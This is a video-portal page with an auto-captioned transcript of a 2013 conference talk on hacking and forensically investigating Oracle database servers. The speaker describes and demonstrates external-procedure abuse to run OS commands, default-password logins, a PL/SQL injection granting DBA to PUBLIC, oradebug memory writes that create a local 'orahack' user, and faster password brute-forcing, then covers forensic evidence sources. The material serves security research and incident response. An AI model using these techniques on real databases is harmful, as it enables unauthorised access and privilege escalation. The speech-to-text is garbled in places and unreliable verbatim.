Hacking and Forensicating an Oracle Database Server

Video thumbnail (Frame 0) Video thumbnail (Frame 3285) Video thumbnail (Frame 5339) Video thumbnail (Frame 6448) Video thumbnail (Frame 14741) Video thumbnail (Frame 23034) Video thumbnail (Frame 25261) Video thumbnail (Frame 30059) Video thumbnail (Frame 33259) Video thumbnail (Frame 34290) Video thumbnail (Frame 35342) Video thumbnail (Frame 36552) Video thumbnail (Frame 38320) Video thumbnail (Frame 39583) Video thumbnail (Frame 40479) Video thumbnail (Frame 41587) Video thumbnail (Frame 42615) Video thumbnail (Frame 44677) Video thumbnail (Frame 45711) Video thumbnail (Frame 46922) Video thumbnail (Frame 47841) Video thumbnail (Frame 49555) Video thumbnail (Frame 50504) Video thumbnail (Frame 51492) Video thumbnail (Frame 52451) Video thumbnail (Frame 53369) Video thumbnail (Frame 54478) Video thumbnail (Frame 55442) Video thumbnail (Frame 57366) Video thumbnail (Frame 69732)
Video in TIB AV-Portal: Hacking and Forensicating an Oracle Database Server

Formal Metadata

Title
Hacking and Forensicating an Oracle Database Server
Title of Series
Author
License
CC Attribution 3.0 Unported:
You are free to use, adapt and copy, distribute and transmit the work or content in adapted or unchanged form for any legal purpose as long as the work is attributed to the author in the manner specified by the author or licensor.
Identifiers
Publisher
Release Date
2013
Language
English

Content Metadata

Subject Area
Abstract
David Litchfield is recognized as one of the world's leading authorities on database security. He is the author of Oracle Forensics, the Oracle Hacker's Handbook, the Database Hacker's Handbook and SQL Server Security and is the co-author of the Shellcoder's Handbook. He is a regular speaker at a number of computer security conferences and has delivered lectures to the National Security Agency, the UK's Security Service, GCHQ and the Bundesamt f¸r Sicherheit in der Informationstechnik in Germany.
Server (computing) Sequel Kerberos <Kryptologie> Database Mereology Field (computer science) Area Twitter Product (business) Revision control Maize Information security Vulnerability (computing) Turbo-Code Vulnerability (computing) Concentric Server (computing) Database Bit Exploit (computer security) Website Hacker (term) Information security Buffer overflow Window Oracle Computer worm Data buffer
Server (computing) Game controller Injektivität Archaeological field survey Sheaf (mathematics) Database Login Disk read-and-write head Programmer (hardware) Blog Integer Computer forensics Information security Computing platform Physical system Dependent and independent variables Email File format Archaeological field survey Electronic mailing list Database Incidence algebra Event horizon Software Personal digital assistant Hard disk drive Information security Computer forensics Oracle
Injektivität Run time (program lifecycle phase) Code Length Set (mathematics) Parameter (computer programming) Client (computing) Mereology Computer programming Formal language Mechanism design Mathematics Hooking File system Flag Cuboid Information security Oracle Physical system God Vulnerability (computing) Injektivität Structural load Moment (mathematics) Bit Maxima and minima Instance (computer science) Variable (mathematics) Connected space Web application Message passing Process (computing) Telecommunication Buffer solution Right angle Procedural programming Computer forensics Data buffer Functional (mathematics) Game controller Server (computing) Sequel Computer file Firewall (computing) Password Binary file Product (business) Number Hacker (term) Internetworking Intrusion detection system Authorization Integer Summierbarkeit Address space Metropolitan area network Authentication Installation art Default (computer science) Information Key (cryptography) Expression Database Directory service Limit (category theory) Cartesian coordinate system System call Exploit (computer security) Word Visualization (computer graphics) Integrated development environment Logic Password Statement (computer science) Family Buffer overflow Local ring Window Library (computing)
Server (computing) Injektivität Sequel Password Database Selectivity (electronic)
Ocean current Trail Server (computing) Functional (mathematics) Game controller Injektivität Sequel Patch (Unix) 1 (number) Insertion loss Parameter (computer programming) Computer font Mechanism design Object (grammar) Authorization Selectivity (electronic) Summierbarkeit Information security Library (computing) Vulnerability (computing) Default (computer science) Injektivität Default (computer science) Stapeldatei Interior (topology) Parameter (computer programming) Database Cursor (computers) Formal language Personal digital assistant Query language String (computer science) Statement (computer science) output Object (grammar) Procedural programming Table (information) Physical system Vacuum
Injektivität Server (computing) Sequel Interior (topology) Parameter (computer programming) Database Formal language Semiconductor memory Query language Object (grammar) Statement (computer science) Right angle Library (computing)
Injektivität Sequel Weight Set (mathematics) Parameter (computer programming) Formal language Wave packet Data mining Duality (mathematics) String (computer science) Object (grammar) Statement (computer science) Moving average Right angle Library (computing)
Context awareness Sequel Weight Parameter (computer programming) Database transaction Rule of inference Formal language Declarative programming Compiler Message passing Query language Personal digital assistant String (computer science) Object (grammar) Query language Autonomic computing Statement (computer science) Selectivity (electronic) Library (computing)
Injektivität Functional (mathematics) Sequel State of matter Debugger Parameter (computer programming) ACID Database transaction Inclined plane Formal language Revision control CAN bus Process (computing) Semiconductor memory String (computer science) Password Normed vector space Query language Selectivity (electronic) Right angle Library (computing) God Oracle Row (database)
Code Patch (Unix) Multiplication sign Debugger Java applet Code Database Database Online help Befehlsprozessor Semiconductor memory Computer configuration POKE Object (grammar) Buffer overflow
Functional (mathematics) Process (computing) Database System call Physical system
Computer file Multiplication sign Physical system
Ocean current Computer file Online help Computer forensics
Functional (mathematics) Touchscreen Code Weight Bit Semiconductor memory Personal digital assistant Hacker (term) Password Operating system Physical system Local ring Speicheradresse Window Address space Spacetime Physical system
Execution unit Motif (narrative) Computer file Semiconductor memory MIDI Physical system
Game controller Cellular automaton Right angle Pole (complex analysis) Physical system
Group action Functional (mathematics) Weight Mereology Semiconductor memory Hacker (term) Password Operating system Pole (complex analysis) Physical system Address space Spacetime Physical system
Functional (mathematics) Code System administrator Mathematics Semiconductor memory Term (mathematics) Password Gastropod shell Right angle Data structure Hydraulic jump Physical system Reverse engineering
Functional (mathematics) Computer file Network socket Multiplication sign Hacker (term) Pole (complex analysis)
Computer file Information Code Source code Java applet Code Database Basis <Mathematik> Tracing (software) Semiconductor memory Gastropod shell Operating system Right angle Procedural programming Summierbarkeit God
Context awareness Metre Information String (computer science) Object (grammar) Query language Parameter (computer programming) Bit Database transaction Library (computing) Formal language Library (computing)
Functional (mathematics) Code Weight Parameter (computer programming) Bit System call Formal language CAN bus Uniform resource locator Message passing Object (grammar) String (computer science) Hill differential equation Right angle Summierbarkeit Physical system Library (computing) Oracle Physical system
Oracle Corporation Information Weight Weight Parameter (computer programming) Directory service Binary file Formal language CAN bus Error message Function (mathematics) String (computer science) Password Library (computing) Physical system Computer forensics Oracle Library (computing)
Point (geometry) Functional (mathematics) Code Weight View (database) Hidden Markov model Bit rate Binary file Angle trisection Library (computing) Area Default (computer science) Surface Parameter (computer programming) ACID Directory service Formal language CAN bus String (computer science) Procedural programming Object (grammar) Physical system Buffer overflow Library (computing) Vacuum
Axiom of choice Java applet Code Weight Multiplication sign View (database) Demo (music) Source code 1 (number) Set (mathematics) Database Insertion loss Client (computing) Database transaction Special unitary group Computer programming Mathematics Semiconductor memory Flag Addressing mode Information security Error message Library (computing) Oracle Physical system Chi-squared distribution Email Pattern recognition Wrapper (data mining) Software developer Parameter (computer programming) Menu (computing) Bit Database transaction Term (mathematics) Formal language Connected space Process (computing) Telecommunication output MiniDisc Data logger Hacker (term) Information security Arithmetic progression Modem Row (database) Trail Server (computing) Game controller Functional (mathematics) Sequel Computer file Patch (Unix) Real number MIDI Virtual machine Maxima and minima Login Metadata 2 (number) Revision control Hacker (term) Drill commands Summierbarkeit Authentication Default (computer science) Execution unit Dependent and independent variables Multiplication Information Server (computing) Login Database Local area network System call Mathematics Cache (computing) Uniform resource locator Database normalization Software Query language String (computer science) Password Statement (computer science) Object (grammar) Table (information) Oracle Vacuum
Graphical user interface Read-only memory Blog Befehlsprozessor Demo (music) Software framework Maize Information Special unitary group Computer forensics Oracle Traffic reporting
thanks very much for coming to this talk we are going to be looking at hacking and forensic ating an Oracle database server although i just gave this talk at a black cat and I had an hour and a half to do I've just found out I've got 50 minutes so I've had to like slice some of the talk so I think the boring forensic side can go in the hacking side is the fun part especially for this audience so we'll concentrate on that so who am i if you're wondering who I am
I'm a vulnerability researcher I started out in buffer overflow exploitation the last bit of work I i did that I'm really proud of was back in 2003 that was definitely stack-based protection built into windows 2003 server I then started moving into database security if anyone remembers the sequel slammer worm I was partly responsible for that unfortunately and when Oracle turned around said their products were unbreakable I laughed a little bit and did some research and proved it wasn't unbreakable by any stretch of the imagination so I've been concentrating on the CNE side of things or had been up until about 2007 2008 and started looking to the forensic side because obviously it was so trivial to break into database servers and continue to this day to be trivial to break into database servers read Oracle the the whole idea of well if someone is breaking in how do we find out what they did when they got there and what we can do to you know work out what we can do to prevent them from doing this the same thing so that led on to the forensic side I recently well recently a couple years ago I solved my company so I get to do free stuff now I have no commercial presses which is great so everything presented here is all the white papers are free or the the tools which I probably won't have time for but you can go to the verity website and download them they're all free there's there's no commercial version of it or anything like that so yeah if you want to follow my research I can be found on d-lish field on Twitter or email me at david at verity calm that with a 3 ferny
so database breaches are common that's much as a given these days you I don't think I need to convince many people here that databases are whether the goodies are at I recently did a survey on the Oracle L mailing list which is like for dbas and programmers and stuff like that it's a fairly good list and I asked who's doing checks on their logs you know like security logs and so on and only one third of dba's are actually checking their stuff and most of those using grip and I find that astonishing because let's face it greps not going to work on you know binary based you know bespoke custom file formats that most databases have forensics seems to be this old date based forensics specifically seems to be this no-man's land where the incident response people are saying well you know I understand the IR stuff really well like analyzing hard drives and so on but databases well that's this whole other extra stuff I need to learn and right now i'm working with too many other cases and the database guys like whoa i know all about how to like improve the speed of a database and and so on but when it comes to ir stuff yeah that's that's way over my head i'll stick to the stuff i know so there's this seems to be this no-man's land where no one seems to be doing any work and as a consequence it's like behind it lags behind on the forensics front so getting to the good
stuff compromising the database so in a typical day based compromise there are several stages first off there's gaining access obviously once they've managed to gain access they obviously then need to elevate privileges if they want to have full control over that database server once they've got the privileges the requisite proves is privileges to do whatever they want they might want to modify data they might want to exfiltrate data there's a whole number of things that they want to do and thereafter they might want to use that database server as a staging platform to attack the rest of the network you know so that might include breaking out the database to run operating system commands and then download their toolkits and so on so we'll look at each of these sections individually okay so
I've been playing with Oracle for 10 years give or give take a year or so and yeah it was started when Larry Ellison announced that his conference that Oracle was unbreakable and you know that you say that to a hacker and that's like a red bull to a red bull to a flag a red flag to a bull and I was drinking red bull earlier and I think that's why I'm speaking so fast as well and I've got red borough in the brain not red flags so yeah the my brother and I did quite a bit of research and Mark found my brother mark found a really interesting floor and this is a remember an e al 4 plus certified products under the common criteria and Mark van der floor basically where if you entered an overly long username there was a stack-based buffer overflow which was trivial to exploit so a product which under the common criteria is supposedly secure you know it could could in the authentication mechanism alone be trivially compromised and of course that wasn't the only floor there's a there were a number of issues buffer overflows and the TNS listener I'll explain in a minute in fact let's explain what the TNS listener is okay so you have the Oracle database server the first port of call a client connects to is the TNS listener the tienes listener is responsible for communication on the Oracle database server this is really is concerned by the way I can't see anyone's faces you know so also can see these bright lights so but anyway the the the TNS listener is responsible for communication so when a client connects to the TNS listener it hands off the connection to the Oracle database process and communication takes place there after now Bettina's listener itself has had a number of buffer overflows it in the past so again without a user ID and password an attacker can exploit these two trivially gain control but a much more interesting attack one that doesn't require exploitation of buffer overflows was a thing known as external procedures exploitation X prod so I'll go into to that very very quickly so let's say you're using the database normally and you want to execute PL SQL code PL SQL code is like the the way you extend the Oracle database server and can like execute stuff that basically allows business logic to take place in and so on now let's say pl/sql which is you know a fairly substantial language doesn't do what you require it to do what you can do is write a we see program a we see library and hook that into the database server by using external procedures now what happens is once we you know compile our library we then tell the database server about it by doing out create library statement and we wrap that library within a procedure basically which then caused the the function within that library now what happens is the Oracle process connects back to the TNS listener and says will you load this library execute this function and pass it these parameters and the tennis lesson goes well you know I won't do it for you but I'll tell you what I know a program that will and that launches this program called X proc and tells the Oracle process to connect to X proc and X re the the Oracle database process then says 2x bog load this library execute this function and pass it these parameters and xbox goes in and does that for it now normally this happens over named pipes but it turns out that you can use TCP as well which is great because me on the other side of the Internet can connect to a TNS listener providing of course the firewall allows access and there are on firewalled Oracle servers out there and say to thee to the TNS listener I'm the Oracle process wink wink nudge nudge will you load this library for me and the TNS listener sends back mere message over TCP and says no but if you connect to this port xpac will do it for you so I then connect to that TCP port that xbox is now listen on and then I said to xbox hey do me a favor will you load this library execute this function and pass at these parameters and X prop goes yeah no worries then there you go without a user ID and password we can load any library we want execute any functional parts at any parameters so of course we could use load msvcrt.dll the microsoft visual c runtime and execute the system function or if it's a UNIX system we could call lipsy and do exactly the same thing so we now a running code as the user account that Oracle runs under so on Windows that's going to be local system or Linux it's going to be the oracle user by the way as far as the database is concerned you are God so Oracle fix that and it's a really funny yeah it is actually funny fix we're buying they said okay what we're going to do now is limit where you can load load libraries from and any attempt to load a library outside of the the designated place will log that just so you know there's some forensics information there and they did that by using sprint f2 to pass the library name into a stack-based buffer and anyone who programs and see here and and with a fixed size buffer on the stack without any length checking done you immediately know well sprint f is
going to lead to a stack-based buffer overflow vulnerability so even though they limited the library that where the library could be loaded from all's I needed to do to to regain control without user ID and password was exploit this new buffer overflow in the logging process so Oracle we were informed about of that and they they fixed it by putting a length check before calling sprint f why they didn't call SN printf I don't know but they decided to remain with the sprint f now it turns out that any environment variable names within the library named are expanded but that's expanded after the length check now so if i go dollar path and let's face it a path is maybe 200 500 characters or something like that suddenly we get to exploit this buffer overflow again just by going down a path dollar part dollar path we find the sweet spot because let's to be honest the path might be different on one system against another system but when we find that sweet spot where you know the communication is just reset because you know the xpac dies we can then move backwards byte by byte by byte overwrite the save return address and we have an expression in the UK Bob's your uncle I don't know if you've got it over here Bob's your uncle you own the process again so yeah the thing is even to this day if you are local to an Oracle database server in other words let's say you've got SSH access if your local you can still do this trick locally to get code to run in someone else so 10 years after the fact we can still do this up oh and incidentally of course fut LT CP is available once we're connected to the database server as a low privileged user we can use utl tcp to create the right packets and because we're now suddenly local so from the Oracle process we are communicating directly with the listener and ex Brock so again we can still affect this kind of attack and today Oracle is still vulnerable to this kind of thing now one would think that dropping msvcrt.dll in the directory where oracle allows you to load libraries from is a bad idea right well guess what's in there you know it should be in the windows system32 directory but for some reason they thought well we don't want it in there as well we sorry we we need it in the oracle home directory in the bin directory it's like so they make all these fixes to prevent you from calling the system function in msvcrt.dll but they go ahead and then dump the dll in the same directory so it's all for naught so I really don't understand what kind of security questions are being asked at that organization like we're about to do this is a good idea if not let's not do it and find another solution that's the minimum kind of security question that should be going on and it's clearly not going on as far as I'm concerned so anyway there's a whole bunch of ways that we can use to to gain access without a user ID and password and of course Oracle is one of these great database servers that has depending upon the applications you install a number of default accounts with default user IDs and passwords installed now this has changed obviously in in 10g you now have to set username and password sorry the password for the key account sists this man DB an SMP and sorry sis sis man system DB an SMP during the install process whilst you're installing node the default passwords are in place so sis has a passwords of change on install by default but during the installation of the Oracle server the password is still change on install so if you can find someone installing Oracle at that particular moment you can obviously still connectors assists with the password of change on install and do you know fairy stuff whilst the service being installed obviously you have to hit the the moment right it to be fair it's probably never going to happen in the real world it's just one of those things you observe in the background but there's a whole bunch of accounts out there that a typically locked but still have a default password in place and the you'll find in the wild there are instances of servers out there with a you know dbsnp still with its DBN SMP password ctxs still has its password of ctxs in fact there are about six to seven hundred accounts depending upon what products have been installed with default user names and passwords so even if you can't exploit any buffer overflows trying a username with its the username as its password is a good guess and so yeah there's a whole number of weak passwords and account compromises available and if we have access to the file system what you'll find is that the passwords are often logged they're encrypted but they can be decrypted because we know what the keys are that the on the file system there are certain log files where we can snap the passwords out so again if and their world readable of course as well and so yeah even if we don't have a user ID and password and we have local access to the box we can still gain access by snuffing these passwords and of course if we're dealing with a web-based application then we can just piggyback if it's vulnerable to sequel injection we can just piggyback the whole you know account authorization processes sorry authentication process is handed handled for us by the application so we just piggyback out our sequel injection of the back of it okay so assuming we get access let's I'm just going to create an
account and create use a DEFCON identified by password mmm great quit grant so I'm going to give this DEFCON user a grant crate session rather to DEFCON the only privilege required to connect to the database server is create session I'm then going to connect as this guy I create a DEFCON password okay so this is the account we're going to use to to run out and nefarious stuff select star from session principal see that's all he's gone okay crate session so basically this user the own privilege he's being granted directly is the create session privilege so he can connect to the database server and he can't do anything himself from here on in but there's a special user account called public which means everyone on the database server essentially so whatever public can do DEFCON user can do as well now I spoke about PL sequel
earlier on it when I was referencing external procedures the default security mechanism for executing pl/sql objects such as procedures packages and functions and so on is the definers privileges are used to execute the the object so if the cyst user creates a PR sequel package he's the definer any vulnerabilities in that as the definer will execute with sis privileges that's the default you can also specify using the auth ID keyword the current users privileges should be used but by default it's the definers privileges so any package which is is owned by a highly privileged user and is vulnerable to PL sequel injection can be abused by an attacker to gain full control I'm not for controlled its fate it depends on who owns the package but in the case of sis sis has all the privileges that's required so yeah if it's owns a a vulnerable package then an attacker with the only create certain privileges can exploit this floor to gain full control of the database server now Oracle has probably had about three to four hundred such issues found in sis own packages so we're not just talking about a one and two case scenario kind of thing this is the Achilles floor in the Oracle database server and continues to be so every three months Oracle release is a critical patch update sometimes they fix five critical flaws sometimes 20 to 30 critical flaws more often than not there are at least one or two if not more PL sequel injection vulnerabilities in Oracle so I'm going to show you a fake one because I don't want to put you know yeah i'm just going to show you one that i made so if you want real ones look at the critical patch update from the last time or if you want a brand spanking new one wait for the next one two critical patch update to come out there there to a penny these kind of flaws so we would as an attacker let's say remember we only have the crate server session privileges if we wanted to do things like delete the audit trail we also need the privileges to do that we can use these sequel injection floors in high privileged packages to do things like that or we might alternatively just say grant ourselves DBA now that would be a very noisy thing to do obviously in a real-world attack and you probably want wouldn't want to do that so what you you might find is people inserting directly into the sis off table which essentially does the same thing as the DDL statement for grant DBA but it uses an insert instead to grant those privileges and in even then you probably all of this kind of stuff is making noise and in probably won't be done but for the sake of argument it's a nice demonstration here so let's do it so there was a nice
little attack previously or a way of facilitating attack where we could generate our own cursor that we would pass our nefarious see and we would inject a the dbms underscore SQL to execute function into the vulnerable procedure and that would go ahead and execute with the high privileges so whatever SQL we pass for be at grant DBA would execute with the higher privileges but Oracle went ahead and fixed that so what we need now is another way of looking for ways of running arbitrary SQL with sequel Microsoft sequel server you can batch SQL statement so you can just like do a select then an insert then a grant and a crate whatever you want one after the other in any kind of sequel injection situation with Oracle you can't batch statements so if we wanted to say something like grant DBA to to public and it's in the middle of a select statement that's you know whether vulnerable actually let's talk about that quickly here's the sample that we're going to use it can everyone see that the back is the the font big enough yeah it should be so all we're doing is the the procedure owned by sis in this case I've called at von proc and it takes the user input struck and concatenates it into this query select object name from all objects where owner equals user input and then execute that query now this here is an example of PL sequel injection but because it's a select statement we're injecting him to a select statement we would be limited to without an additional hack we'd be limited to doing a another selects time for like a union select or something like that but that's that doesn't get us DBA privileges so what we need to do is you know work out another way of doing that so we have our our auxiliary inject function in this case it's the new contacts function on the DBMS underscore xml query package now what this does is basically takes an SQL query such as select star from jewel and execute that but it doesn't have to be a select
statement it could be a grant DBA statement which will show you in a second once a finish I've just freshly
started the Oracle database service so things need to load into memory right great that's it done and that will return very well so now we're going to
use this to exploit the floor and let me put this in front of that so before doing that let's show you it's vulnerable to sequel injection so we're going to execute foo
that's how you'll actually execute normally so what would happen is food would be placed into straw and the query
would execute if I put a single quote in
there we see sequel command not properly ended so that's indicative of a sequel injection floor go minus minus and you know that- mine especially chops off the rest of the statement and yet so we're all good there so now we can go ahead and exploit that to gain did you sorry I
thought someone said something behind the back nor does a ghost or something lost my train of thought right if I do set roll DBA first off you'll see we've not been given the DBA wrong DBA role has been granted or does not exist so now we're going to gain DBA privileges
so what we've done there is injected this is our little trick by the way remember I said we can't do if we're in a select statement we can't do anything other than a union select or whatever or subselect well this declare pragma autonomous transaction basically tells the pr sequel compiler this query is fine to execute on its own it's it's own transaction you know go ahead everything will be safe now we as a consequence we can you know execute arbitrary pl/sql and in this case it's begin execute immediate grunt dbx public and we end that and we get the you know the message it's successfully completed so if we go set rule d bien now DBA role has been
sent and if we do select star from session privileges honestly it's so easy to break into our record you don't need to applaud me on that you know it's like star from session but thank you it is appreciated I'm here all week try the steak so we've now got all these session privileges so we've gone from crate session only through to exploiting a PR sequel injection floor which there are three to four hundred of depending upon the the version of oracle that you're looking at and suddenly we are with God as far as the state base is concerned so now i'm going to do alter user cysts identified by password so i'm now changing the password for the cysts user and as you'll see in a minute logging in assists is going to give us at some fun stuff connects this last password at our CL as this DBA okay so we're now connected as the sis user we're going to start playing with a thing called or a debugger which is a
nice little facility that allows us to read from the Oracle process memory right to the Oracle process memory and also execute arbitrary functions and so on so let's before you do that yeah
breaking out of the database are we doing for time we're doing okay great breaking up the database running object code well obviously if there are buffer overflows and again maybe each CPU one buffer overflow sometimes there's zero buffer overflows being fixed but actually I think there's at least one in every one or more being fixed in every critical patch update sometimes there's lots some yeah sometimes they get a slew of floors coming in but we're specifically going to look at the or a debug stuff in now what ouran debug does is basically as I said it allows us to
pick and poke at memory or a tea bag or a debug has been documented before by the way so this is nothing new people have been speaking about using already debuggers are hacking facility for a long long time so yeah this isn't like odeon dropping by any stretch of the imagination so if I got or a debug help so here's the help options some of them
are very interesting some of them are not so interesting but we are going to be looking at these to pick and poke and
call which basically takes a function
name and you can call that function so here's one I made earlier ok so first
off we need to set the process ID we want to debug and we're just going to use the process ID of my given process
so set my ped so one of the great things
about our a debug well let me rephrase
that it's bad that we can do this with or a debug but one of the good things thereafter is any time you use or a debug a trace file is created CD dr are
actually find strong /alright want to see or a debug ok
I just want to find the current / OD do
628 okay so this is our current one tight so we can see remember the first
rd baulkham and I should was help that's written to this trace file and then I did set my ped and so on that's written to the trace file so anytime you use our debug it's being written to a trace file which is great when it comes to forensics so what we're going to do here
is we're going to run an operating system command because remember on Windows Oracle runs as the local system user so any arbitrary code i execute is going to execute with the privileges of the local system user and in this case I'm going to create a user account called aura hack with a password of PWD and add it so and I'm going to call the system function so what I'm going to do first is right to this memory address four bytes which is n e.t.a seeeeee so that's the the net space of the net user ID command and then so all this here is basically the net user add PWD / sorry net user or a hack PWD / add and i'm going to write that into memory and you can see here the i increment the address obviously by 4 because if i didn't do that obviously we just overwrite the same bit of memory so what you'll see
here and so clear the screen so oh don't
do that to me right give me two secs I
because I restarted the system the
memories gone so i'm just going to fudge one
we can do this by the way again using or a debug we can do dump a stack trace and then using utl file we can read that in but i'm just going to cheat because that takes a wee bit longer 3 4 3 17 we're
dumb p for 372 ok pick one at random ok
we don't need execute read/write we just need read right okay Reserve that will do right 1 e 2 3
edit find replace one DDF the bling replace all ok home and control C right let's try this again okay great so what
we've done there is written the the net space part so let's add the rest of it
so I now have written in memory the net
user or a hack PWD / add that's the operating system command I want to execute now I basically call the system
function here and pass to it the address at which can be found the operating system command the net user add stuff so before i do that if i go net user groups
net user we can see I've got vm a user
administrator David and guest there's no or a hack account right now but i'm
going to get oracle to now create the user by calling the system function function return 0 as it should do so net
user now shows us we've got this or a hack account in there so thank you so what we've done is from a lowly create session privileged user account jump privileges to DBA change this is password and now we're connected assists we can then start poking and peeking into memory and running arbitrary functions now of course doing we're only limited by our imagination in terms of what we want to do as far as executing arbitrary code is concerned we could use us too shell back a shell or send us back a reverse shell or anything we want which is obviously need to create the right structures and memory get the right addresses and send them to to the function basically so and one of the great things of course is when you call
a function the value the return value
whatever eax is returned an e ex is basically dumped in here so if we like call the socket function we can get the socket handle by looking at the whatever the function returns and so on in there okay and then we can then add the N and
so on so but I think the key takeaway
from there is every time you use or a
debug it's in that trace file so what we can do is look in that trace farm did you jus you can see the stuff I've
written to memory I can now extract and then as a forensic investigator I can go ahead and start working out what the attacker attempted to do so if they indeed trying to spawner of our shell or something like that their code is going to be in memory not in memory in this trace file so we can build up a very good picture so anything they're doing is is is in there but you do have to remember of course that we're connected assess we as far as that day basis concern we are God so if we wanted to we could delete that trace file suffice it to say though if they don't delete the trace file it's a wonderful source of information right and of course we can
run operating system commands in other ways we spoke about external procedures
earlier let's do that first off I'm going to do one that will
fail and the reason I'm doing that is
because i want to show you another
useful bit of information remember i said it was logged the name of the library is logged that's actually run proper on in the back right now because
I've just specified msvcrt.dll I haven't specified a path or anything like that it will look through the system path for the you know the right dll and decide that it's not in the right location it's not in the oracle home so we'll get a message being logged saying that it's an invalid deal our path so remember I said you have to wrap it this bit of code at the bottom wraps the the call so let's create that and remember that this is
going to fail when I execute the function so and we'll get the invalid
DLI path but if we look here where did
it create it and it find i Jes now we got two okay we can see in there someone trying
to load msvcrt.dll and it was cysts and the library name was this and everything like that so again useful forensics information worth looking at that
directory but let's make it work now
remember I said they dropped msvcrt.dll in the the bin directory in Oracle home so we can now go ahead and recreate that
if I do net user we've got the Oracle
hack or a hat user we're now going to create or hack to the password so we get
that success with completely completed successfully and that user we've now got
the our hack to user in there and so on so dropping msvcrt.dll and there wasn't
a smart idea but to be fair if you think about it watch this see the back / CD DV
hmm CD bin ok this is the Oracle home directory that's all attack surface you know these these are in there by default any function on there we can obviously call you know and if there's you know susceptible to things like overflow or whatever then we can still use this external library thing what Oracle should do is have a area where there are no dll's by default there are no code objects by default and if you want to add your own stuff you can put it in there having it as the Oracle home is 2 lakhs as far as I'm concerned so yeah all of this is attack surface basically from external from an external procedure point of view so yeah it should be tightened up considerably we doing for
time ok
okay so I've really run through the the hacking side of things so we've got a couple more minutes left for a wee bit of the forensic side so the database has been breached and what do we do now where is the evidence with Oracle the evidence is everywhere it's great there's so much redundancy built into the Oracle database server it's wonderful security not so wonderful if we look at Microsoft sequel server sequel server 2005 I think has had three critical patches required since 2005 so what that's pushing six years and it's had three critical patches oh cool Microsoft sequel server 2008 i think is at zero if we look at oracle you know each every three months patches are coming out time and time again as I said sometimes they're patching up to 30 20 to 30 issues sometimes it's only five or six but every three months you have to worry about or well you have to worry about Oracle security all the time but every three months it's but it's patch day but sequel server is pretty crap when it comes to you know logging stuff that's useful to an investigator obviously you've got the transaction log and you've got the error log file but as far as that scan as far as you know useful information goes that's pretty much it Oracle it's great it's wonderful so let's look at some of these locations so obviously the the system metadata itself the the information that makes up the database server is a wonderful source of information the data files when a record is updated or deleted the data is left intact it's just well each row of data has a 3-bit header how we doing okay go each row of date has a three bite header the first bite of that three bite header has its flags basically and the the fifth bed if you flip that bit it says it's deleted if you flip it again it says it's not deleted okay so we can very very quickly find deleted data by looking at that first bit of the the that three bite header to say is the bit set or on set and whether it's leads it on up so if you delete data if you think I'm hiding you know my tracks i've deleted all my stuff and everything like that it's still in there it's just that bits been flipped or if you update data that bit is flipped and everything and a new a new row is created so it's really useful in that information oh it's really useful when it comes to that information there's a thing called to active session history I wrote a couple of papers on this a few years ago so what active session history is when the Oracle server is running it there's a subprocess running in the background basically pulling the database server every three seconds to find out what's going on at that particular time it takes a snapshot these snapshots are recorded in memory and then every half hour or so this one in 10 of the snapshots are recorded in on disk basically so if you have a query that lasts for say three seconds you're going to have a snapshot in it definitely in memory somewhere if the query lasts for more than 30 seconds chances are there's going to be a snapshot written to the disk so this active session history becomes a really useful source of information for looking at select attacks select attacks obviously are just you know getting access to data so if you are downloading a customer database that say has five million records that's going to take longer than 30 seconds probably if you're using something like utl HTTP or a utl energize exfiltrate data over an out-of-band method across the network that's going to take a long time and so there will be caused to to these sequel statements will be logged in the active session history and there's a friend Zack investigator we can go back and look for evidence of even select attacks the transaction logs you know like the redo logs in Oracle anything that requires a transaction is logged in the reader log so that's another great source of information so that's things like deletes inserts updates select for updates any ddl like grant grant creates and drops and so on all that information can be found in the transaction logs undo segments if you if you make a change an undue segment is created that has information pretend to that change so again we can query that the memory itself in a live response situation we can start querying certain key tables for a key virtual views rather for information so one of them is Vida or SQL it has about three to five thousand queries that have the most recent ones that have been executed so if we can find an attack in progress or an attack which happened just a like half an hour ago on a fairly quiet database server there might be evidence of attacks in there vidad DB object cache is another great source of information so again a couple of years ago I wrote a paper on hacking the Java Virtual Machine built into Oracle and looking through the source code of the the default Java objects there's this utl wrapper that basically takes user input and and passes it to you know that the system function basically so if there is no reference to this utr wrapper anywhere else in the Oracle code and I think it's left over there from development days so no no real world code should be using it so if it's in if it exists in this DB object cache one can infer from that that an attack has probably taken place so again there's these virtual tables which are a wonderful source of information and obviously the log files themselves like the TNS listen a log file is the first port of call any kind of connection is going to be logged in there caveat emptor though when it comes to the TNS little log files when a client connects they passed the program name and stuff like that and that's all logged in the TNS listener but because it's under the control of the client they could say whatever they wanted they could pretend to be a jdbc client whereas that whereas an actual fact their a/c hacking tool so don't fully trust the information in there use it for you like pattern recognition and so on perhaps but or another one for example when you authenticate to Oracle you what happens is you connect to the tienes listener the TNS listener ok the TNS listener then passes you off to their Oracle process and you oughta Kate or attempt to authenticate and if authentication fails the client tears down the connection and you start the whole process can connect to the listener listeners passes you off to oracle and so on now as a consequence of the client being the one responsible for tearing down that session if we don't choose to if we fail a tent occation and we don't choose to tear down that session we can continue to authenticate once we've got that connection to the Oracle process so we can make one connection to the TNS listen which passes off to the Oracle server we then say to the Oracle server is the password for sis this and if the Oracle Service says no no don't that's not the password we don't tell you down the connection we just say to it well how's this for a password for sis and we keep on firing multiple attempts down that the same TCP pipe so we're not having to go through that whole setting up the communication again so what would take typically a minute to go through a couple of hundred passwords we can go through a couple hundred passwords in a second so we speed up brute-forcing obviously later versions of Oracle account locking is enabled by default so we would just go for the Cystic out because you can't knock out that account anyway and obviously the trace files we looked at our a debug earlier I'm not going to have time to show you any of
the tools and stuff if you are
interested in the tools it's it's their free go to the very website download them play with them have fun and everything like that so thanks for listening are there any questions before I disappear I can barely see you so if you do have a question shout town ok no questions then great thank you very very much for coming you
Feedback